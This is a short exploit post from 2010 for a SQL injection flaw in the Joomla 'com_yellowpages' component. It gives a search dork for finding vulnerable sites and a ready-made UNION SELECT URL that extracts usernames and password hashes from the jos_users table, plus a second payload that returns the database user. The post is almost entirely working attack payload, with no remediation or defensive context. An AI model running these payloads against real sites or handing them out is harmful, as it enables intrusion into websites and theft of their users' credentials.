# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability  

# Date : 9- 8 - 2010  

   

# Author : _aL_bayraqim_   

   

# BORDO BERELİLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]  

############################################################  

Dork = inurl:/index.php?option=com_yellowpages   

############################################################  

--- SQL Injection Vulenrability ---  

SQL Injection Vulenrability component "com_yellowpages"  

http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]  

############################################################  

===[ Exploit ]===  

http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--  

+Union+select+user()+from+jos_users--

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课